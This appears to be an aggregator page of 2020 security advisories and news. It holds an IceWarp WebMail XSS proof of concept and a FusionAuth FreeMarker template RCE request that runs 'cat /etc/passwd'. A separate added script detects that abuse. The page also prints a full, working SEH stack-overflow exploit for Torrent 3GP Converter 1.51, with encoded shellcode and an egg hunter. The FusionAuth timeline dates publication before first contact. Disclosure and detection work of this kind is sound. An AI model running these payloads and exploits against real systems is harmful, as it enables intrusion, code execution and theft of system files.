An aggregate of all of GoVanguard’s InfoSec & Cybersecurity related Posts, News, Threats and Data Feeds.

IceWarp WebMail versions 11.4.4.1 and below suffer from a cross site scripting vulnerability.

MD5 | d91c809ee4cd7fbde653e90bfaf0c0ee

[+] Title: IceWarp WebMail Cross-Site Scripting Vulnerability
[+] Date: 2020/01/27
[+] Author: Lutfu Mert Ceylan
[+] Vendor Homepage: www.icewarp.com
[+] Tested on: Windows 10
[+] Versions: 11.4.4.1 and before
[+] Vulnerable Parameter: "color" (Get Method)
[+] Vulnerable File: /webmail/
[+] Dork : inurl:/webmail/ intext:Powered by IceWarp Server

# Notes:

An attacker can use XSS (in the "color" parameter of IceWarp WebMail 11.4.4.1 and before) to send a malicious script to unsuspecting admins or users. The admin's or user's browser has no way to know that the script should not be trusted, and will execute it. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. An attacker can also easily use this vulnerability for social engineering, for example by injecting a fake form field into the page.

# PoC:

[+] Go to Sign-in page through this path: http://localhost/webmail/
or
http://localhost:32000/webmail/

[+] Add the "color" parameter to the URL and write malicious code, Example: http://localhost/webmail/?color=">

[+] When the user goes to the URL, the malicious code is executed

Example Vulnerable URL: http://localhost/webmail/?color="> (Payload: ">)

# Demo Pictures:

[+] https://i.hizliresim.com/yGY6Zj.png

Source

FusionAuth versions 1.10 and below suffer from a remote command execution vulnerability. An authenticated attacker with enough privileges to access the template editing functions (either site templates or e-mail templates) in the FusionAuth dashboard can execute commands on the underlying operating system using the Apache FreeMarker Expression language.

MD5 | c1546986008443760e7e1b822230f95e

@Mediaservice.net Security Advisory #2020-03 (last updated on 2020-01-27)

Title: FusionAuth command execution via Apache Freemarker Template
Application: FusionAuth 1.10 and lower
Platforms: Tested on Windows 10 and Ubuntu 19.10
Description: An authenticated attacker with enough privileges to access the
template editing functions (either site templates or e-mail
templates) in the FusionAuth dashboard can execute commands on
the underlying operating system using the Apache FreeMarker
Expression language.
Author: Gianluca Baldi
Vendor Status: https://fusionauth.io/contact - notified on 2019-10-24
CVE Name: CVE-2020-7799
References: https://lab.mediaservice.net/advisory/2020-03-fusionauth.txt
https://fusionauth.io/
https://freemarker.apache.org/
https://www.mediaservice.net/

1. Abstract.

FusionAuth is a modern open source Access Management application that can be
integrated with multiple technologies and platforms. FusionAuth can be
configured and customized in many ways from the administration dashboard, and
to do so privileged accounts can modify templates.

FusionAuth templates are in fact Apache FreeMarker templates, interpreted by
the Apache FreeMarker template engine. Since it is possible to execute system
commands using the Apache FreeMarker expression language, the template editing
features can effectively be abused to execute remote commands, using the
"freemarker.template.utility.Execute" object.

2. Affected Platforms.

This vulnerability is platform-independent.

3. Fix.

This vulnerability has been fixed in version 1.11 of FusionAuth.

4. Proof of Concept.

Example POST request (Home -> Settings -> Email Templates -> Preview):

POST /ajax/email/template/preview HTTP/1.1
Host: 192.168.0.3:9011
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 796
DNT: 1
Connection: close
Referer: http://192.168.0.3:9011/admin/email/template/edit/2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b
Cookie: JSESSIONID=FA9DB3CBABA6B37E5336AE4B96001807;

primeCSRFToken=kRC228UjAA4ohN_E9PW9kz0HpTlxUDCB_HVrDhBUfWU&emailTemplateId=2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b&emailTemplate.name=COPPA%20Notice&emailTemplate.defaultSubject=Notice%20of%20your%20consent&emailTemplate.fromEmail=no-reply%40fusionauth.io&emailTemplate.defaultFromName=FusionAuth&emailTemplate.defaultTextTemplate=You%20recently%20granted%20your%20child%20consent%20in%20our%20system.%20This%20email%20is%20to%20notify%20you%20of%20this%20consent.%20If%20you%20did%20not%20grant%20this%20consent%20or%20wish%20to%20revoke%20this%20consent%2C%20click%20the%20link%20below%3A%0A%0Ahttp%3A%2F%2Fexample.com%2Fconsent%2Fmanage%0A%0A-%20FusionAuth%20Admin&emailTemplate.defaultHtmlTemplate=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}}
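On the FreeMarker side the fix is to disallow the `?new` built-in for template authors (`Configuration.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER)`). Where a request log or WAF sees the preview/save requests, the same abuse can be spotted in the form body. The following is an added example, not part of the advisory or of FusionAuth: it decodes a body like the one above and flags template fields that instantiate classes via `?new()`. The field names follow the request above; the sample body is constructed.

```python
import re
from urllib.parse import parse_qs

# FreeMarker utility classes that, once instantiated with ?new(), hand a
# template author OS command execution, arbitrary object construction or
# a Jython interpreter. The first one is the class used in the advisory.
DANGEROUS_CLASSES = {
    "freemarker.template.utility.Execute",
    "freemarker.template.utility.ObjectConstructor",
    "freemarker.template.utility.JythonRuntime",
}
# "some.Class"?new(...) -- the built-in that instantiates a Java class
NEW_BUILTIN = re.compile(r'"([A-Za-z_][\w.]*)"\s*\?\s*new\s*\(')
# ?api exposes the raw Java API of a value; not needed in mail templates either
API_BUILTIN = re.compile(r'\?\s*api\b')

def scan_template(text):
    """Return a list of (severity, reason) findings for one template body."""
    findings = []
    for cls in NEW_BUILTIN.findall(text):
        if cls in DANGEROUS_CLASSES:
            findings.append(("critical", "instantiates %s via ?new()" % cls))
        else:
            findings.append(("high", "instantiates %s via ?new()" % cls))
    if API_BUILTIN.search(text):
        findings.append(("medium", "uses the ?api built-in"))
    return findings

def scan_form_body(body, field_suffixes=("Template",)):
    """Decode an application/x-www-form-urlencoded body (as in the preview
    request) and scan every template field. Returns {field: findings}."""
    fields = parse_qs(body, keep_blank_values=True)
    report = {}
    for name, values in fields.items():
        if not name.endswith(field_suffixes):
            continue
        for value in values:
            hits = scan_template(value)
            if hits:
                report.setdefault(name, []).extend(hits)
    return report

# Constructed body modelled on the preview request: the HTML template
# carries an Execute payload, the text template is a benign interpolation.
SAMPLE_BODY = (
    "emailTemplateId=00000000-0000-0000-0000-000000000000"
    "&emailTemplate.name=Notice"
    "&emailTemplate.defaultTextTemplate=Hello%20%24%7Buser.firstName%7D"
    '&emailTemplate.defaultHtmlTemplate=${"freemarker.template.utility.Execute"?new()("id")}'
)

if __name__ == "__main__":
    for field, hits in scan_form_body(SAMPLE_BODY).items():
        for severity, reason in hits:
            print("%-8s %s: %s" % (severity, field, reason))
```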

5. Disclosure Timeline

2019-10-23 - First contact (issue in FusionAuth 1.9.1).
2019-10-24 - First PoC sent to the vendor.
2019-10-25 - Vendor investigates the issue.
2019-10-28 - Issue is confirmed and a disclosure date is agreed upon (2020-01-23).
2019-10-29 - Vendor silently releases a fixed version (FusionAuth 1.11.0).
2020-01-20 - Asked for updates on issue.
2020-01-20 - Vendor states that the issue has been fixed already.
2020-01-22 - Assigned CVE-2020-7799.
2019-02-27 - Advisory published.

Copyright (c) 2020 Gianluca Baldi and @Mediaservice.net. All rights reserved.

Source

This application, known as the SolarWinds n-Central Dumpster Diver, utilizes the nCentral agent .NET libraries to simulate the agent registration and pull the agent/appliance configuration settings. This information can contain plain-text Active Directory domain credentials. This was reported to SolarWinds PSIRT (psirt@solarwinds.com) on 10/10/2019. In most cases the agent download URL is not secured, allowing anyone without authorization who knows a customer id to download the agent software. Once you have a customer id you can self-register and pull the config. The application will test the availability of the customer id via the agent download URL. If successful, it will then pull the config. We do not attempt to just pull the config because timing out on the operation takes too long. Removing the initial check could produce more results, as the agent download could be blocked whereas agent communication would not be. Harmony is only used to block the nCentral libraries from saving and creating a config directory that is not needed.

MD5 | 327907230e1957acb4b9383e511c3db6

Source

Torrent 3GP Converter version 1.51 suffers from a stack overflow vulnerability.

MD5 | 7fea22feb98c7bd2b313292c883dceea

# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH)
# Exploit Author: boku
# Date: 2020-01-24
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe
# Version: Torrent 3GP Converter Version 1.51 Build 116
# Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
# 1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86
# 2) run python script & open created 'crash.txt' file
# 3) select-all > copy-all
# 4) in app, click 'Register' on the bottom
# 5) in 'Name:' textbox enter 'a'
# 6) in 'Code:' textbox paste buffer
# 7) click 'OK', calculator will open & app will crash

#!/usr/bin/python

# Bad Chars
# \x00 => \x20 # \x0d Truncates buffer # \x2d Gets ejected from buffer
# \x61-\x6f => \x41-\x4f / ASCII Lower => ASCII Upper
# \x70-\x7a => \x50-\x5a / ASCII Lower => ASCII Upper
# \x9a => \x8a # \x9c => \x8c # \x9e => \x8e
# \xe0-\xef => \xc0-\xcf # \xf0-\xf6 => \xd0-\xd6
# \xf8-\xfe => \xd8-\xde # \xff => \x9f
# badChars='\x00\x0d\x2d\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x9a\x9c\x9e\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xee\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
# Max shellcode size is 2384 bytes
# - First 2384 bytes of our buffer is left unmangled on the stack
# msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode
# x86/alpha_upper chosen with final size 447
# Payload size: 447 bytes
## msfvenom x86/alpha_upper GetPC Routine ##
# [!] Does not work because of the bad chars!
# Manually replaced with a working version of GetPC for this exploit
# (all buffers are bytes so the script behaves the same on Python 2 and 3)
# 89E5 mov ebp, esp
shellcode = b'\x54\x5D' # push esp # pop ebp
# DBCD fcmovne st, st(5)
shellcode += b'\x89\xCF' # mov edi, ecx
# D975 F4 fstenv [ebp-C]
shellcode += b'\x47\x47\x90' # inc edi # inc edi # nop
# 5F pop edi
shellcode += b'\x90' # nop
shellcode += b"\x57\x59\x49"
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x55\x50\x55\x50"
shellcode += b"\x33\x30\x43\x50\x4b\x39\x4b\x55\x46\x51\x59"
shellcode += b"\x50\x42\x44\x4c\x4b\x30\x50\x36\x50\x4c\x4b"
shellcode += b"\x56\x32\x34\x4c\x4c\x4b\x56\x32\x42\x34\x4c"
shellcode += b"\x4b\x34\x32\x31\x38\x34\x4f\x4e\x57\x50\x4a"
shellcode += b"\x37\x56\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x35"
shellcode += b"\x31\x43\x4c\x34\x42\x56\x4c\x47\x50\x39\x51"
shellcode += b"\x58\x4f\x34\x4d\x45\x51\x59\x57\x4a\x42\x4a"
shellcode += b"\x52\x46\x32\x56\x37\x4c\x4b\x31\x42\x44\x50"
shellcode += b"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x50\x4c\x42"
shellcode += b"\x31\x33\x48\x4b\x53\x51\x58\x45\x51\x4e\x31"
shellcode += b"\x30\x51\x4c\x4b\x31\x49\x51\x30\x55\x51\x59"
shellcode += b"\x43\x4c\x4b\x30\x49\x42\x38\x4b\x53\x37\x4a"
shellcode += b"\x57\x39\x4c\x4b\x47\x44\x4c\x4b\x53\x31\x59"
shellcode += b"\x46\x46\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x34\x4d\x35\x51\x4f\x37\x57\x48\x4d\x30\x53"
shellcode += b"\x45\x4c\x36\x45\x53\x53\x4d\x4a\x58\x37\x4b"
shellcode += b"\x43\x4d\x46\x44\x33\x45\x4a\x44\x56\x38\x4c"
shellcode += b"\x4b\x36\x38\x47\x54\x45\x51\x38\x53\x32\x46"
shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x50\x58\x45"
shellcode += b"\x4c\x53\x31\x59\x43\x4c\x4b\x45\x54\x4c\x4b"
shellcode += b"\x33\x31\x38\x50\x4d\x59\x57\x34\x57\x54\x36"
shellcode += b"\x44\x31\x4b\x51\x4b\x33\x51\x36\x39\x31\x4a"
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x50"
shellcode += b"\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d\x51\x4d"
shellcode += b"\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x48\x32\x35"
shellcode += b"\x50\x43\x30\x33\x30\x46\x30\x43\x58\x46\x51"
shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f"
shellcode += b"\x4b\x5a\x50\x38\x35\x39\x32\x31\x46\x53\x58"
shellcode += b"\x4e\x46\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58"
shellcode += b"\x55\x47\x4c\x35\x56\x43\x4c\x35\x5a\x4b\x30"
shellcode += b"\x4b\x4b\x4d\x30\x42\x55\x44\x45\x4f\x4b\x37"
shellcode += b"\x37\x45\x43\x54\x32\x32\x4f\x42\x4a\x55\x50"
shellcode += b"\x36\x33\x4b\x4f\x58\x55\x45\x33\x55\x31\x32"
shellcode += b"\x4c\x43\x53\x35\x50\x41\x41"
# Stack EggHunter for fun & profit
egg = b'BOKU'
hunterOS = b'\x41'*(2784-len(egg+egg+shellcode))
# After executing the code in nSEH, we are left with 88 bytes to create our Hunter
hunter = b'\x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC
hunter += b'\x5B' # pop ebx / EBX=PC
hunter += b'\x80\x43\x29\x20' # add byte [ebx+41], 0x20 / 20+55=75=jnz
hunter += b'\x80\x43\x33\x20' # add byte [ebx+51], 0x20 / 20+55=75=jnz
hunter += b'\xB8\x42\x4F\x4B\x55' # mov eax,0x424f4b55
hunter += b'\x54' # push esp
hunter += b'\x59' # pop ecx
hunter += b'\x90'*18 # nop fillers for jnz short -7 loop
hunter += b'\x49' # dec ecx
hunter += b'\x3B\x01' # cmp eax, [ecx]
hunter += b'\x55\xF7' # 75F7 = jnz short -7 / Have to avoid bad \xF- chars
hunter += b'\x51' # push ecx
hunter += b'\x5a' # pop edx
hunter += b'\x4a'*4 # dec edx * 4 / check if second egg matches
hunter += b'\x3B\x02' # cmp eax, [edx]
hunter += b'\x55\xDF' # jnz short -31 / back to the loop - avoid bad chars
hunter += b'\x83\xC1\x04' # add ecx, 0x4 / start of shellcode after eggs
hunter += b'\x31\xd2' # xor edx,edx
hunter += b'\x52' # push edx
hunter += b'\xC6\x44\x24\x02\x4B' # mov byte [esp+0x2],0x4b
hunter += b'\xC6\x44\x24\x01\x44' # mov byte [esp+0x1],0x44
hunter += b'\xC6\x04\x24\x39' # mov byte [esp],0x39
# [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent 3GP Converter\bsvideoconverter.exe)
hunter += b'\xc3' # ret
huntRmdr = b'\x41'*(88-len(hunter))
nsehOS = b'\x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr))
nSEH = b'\x83\xC4\x04\xC3' # add esp,byte +0x4 # ret
# 3-byte SEH overwrite using the truncating Null byte
SEH = b'\x0f\x47\x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE}

payload = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH

try:
    # binary mode so the raw bytes reach the file untouched
    f = open("crash.txt", "wb")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created.")

Source

Both the Google Chrome and Mozilla Firefox teams are cracking down on web browser extensions that steal user data and execute remote code, among other bad actions. Browser extensions are add-ons that users can install to enhance their web surfing experience – they offer the ability to do everything from setting a special search wallpaper to displaying continuous weather data to language translation. This group also includes things such as ad blockers and security scanning. While extensions are useful, they can also introduce danger. In addition to intentionally malicious browser extensions that compromise users, legitimate offerings are also common targets for cybercriminals who look to exploit vulnerabilities in their code.

Google Bans Paid Extensions

In this case, Google said that after becoming aware of a widespread pattern of pernicious behavior on the part of a large number of Chrome extensions, it has disabled extensions that contain a monetary component – those that are paid for, offer in-browser transactions and those that offer subscription services. It’s a temporary measure, according to the internet giant – but one that doesn’t yet have a timeline for resolution. “Earlier this month the Chrome Web Store team detected a significant increase in the number of fraudulent transactions involving paid Chrome extensions that aim to exploit users,” it said in a notice, issued Friday. “Due to the scale of this abuse, we have temporarily disabled publishing paid items….

Source

A mid-January spam campaign by criminals behind the popular Necurs botnet shows a dramatic drop in skill and savvy by perpetrators. In a shift from sending sophisticated messages with lethal payloads, Necurs botnets are now peddling get-rich-quick spam within what researchers are calling “amateur” campaigns. The lowering of the Necurs bar, according to IBM X-Force researchers, is tied to the fact that cybergangs are attempting to up their game and adopt new and more sophisticated attacks that are harder to defend against, and are spending less time cooking up deadly Necurs-based spam attacks. Necurs, a prolific and globally dispersed spam and malware distribution botnet, has long been a formidable threat since it was first spotted in 2012. The botnet’s popularity stems from its ability to sneak past spam filters, resulting in high infection rates for its cybercrime clientele and the spreading of the malware GameOver Zeus, Dridex, Loki and TrickBot. However, researchers say that a desire for more targeted attacks and a stronger foothold in networks has forced adversaries over the past year to turn away from Necurs in favor of alternative malware. Most notably, cybercrime groups are now eyeing Emotet as a preferred means of attack over Necurs. Emotet started out as a banking trojan but eventually evolved into a botnet used to distribute malware in enterprise attacks. “Things are changing and with major banking Trojan botnets moving away from Necurs and to distribution through inter-gang…

Source

Aleksei Burkov, an ultra-connected Russian hacker once described as "an asset of supreme importance" to Moscow, has pleaded guilty in a U.S. court to running a site that sold stolen payment card data and to administering a highly secretive crime forum that counted among its members some of the most elite Russian cybercrooks. Burkov, 29, admitted to running CardPlanet, a site that sold more than 150,000 stolen credit card accounts, and to being the founder and administrator of DirectConnection — a closely guarded underground community that attracted some of the world's most-wanted Russian hackers. He pleaded guilty last week in a Virginia court to access device fraud and conspiracy to commit computer intrusion, identity theft, wire fraud and money laundering. As KrebsOnSecurity noted in a November 2019 profile of Burkov's hacker nickname ‘k0pa,' "a deep dive into the various pseudonyms allegedly used by Burkov suggests this individual may be one of the most connected and skilled malicious hackers ever apprehended by U.S. authorities, and that the Russian government is probably concerned that he simply knows too much." Membership in the DirectConnection fraud forum was heavily restricted. New members had to be native Russian speakers, provide a $5,000 deposit, and be vouched for by three existing crime forum members. Also, members needed to have a…

Source

New York State may soon ban municipalities from paying ransomware demands in the event of a cyberattack. State Senators Phil Boyle, George M. Borrello and Sue Serino introduced Senate Bill S7246 earlier this month, in response to the rising tide of cyberattacks targeting government agencies and municipal entities across the country. Some of these – such as Riviera Beach and Lake City in Florida – have paid the ransom, after remediation was deemed to be more expensive than shelling out to the hackers. Others, such as New Bedford, Mass., and the city of Atlanta, have ridden out the infection without paying up. In the latter case, the city ended up spending $2.6 million to recover, with expenditures for incident response and digital forensics, additional staffing and Microsoft Cloud infrastructure expertise. Cybersecurity experts have noted, though, that the decision to pay or not to pay is a complex one, dictated by individual circumstances, budget and risk to data. The bill, S.B. S7246, proposes a blanket policy in New York State that’s aimed at removing the incentive for ransomware operators to keep targeting its agencies, towns and cities. To accommodate the expected remediation costs, the bill proposes the creation of a “Cyber Security Enhancement Fund.” This would be earmarked for municipalities with populations of less than a million residents to upgrade their security postures. “A small investment in local government cybersecurity now, can help stop cybercriminals from…

Source

meshsystem.dll in Valve Dota 2 before 7.23f allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map is mishandled during a vulnerable function call.

Source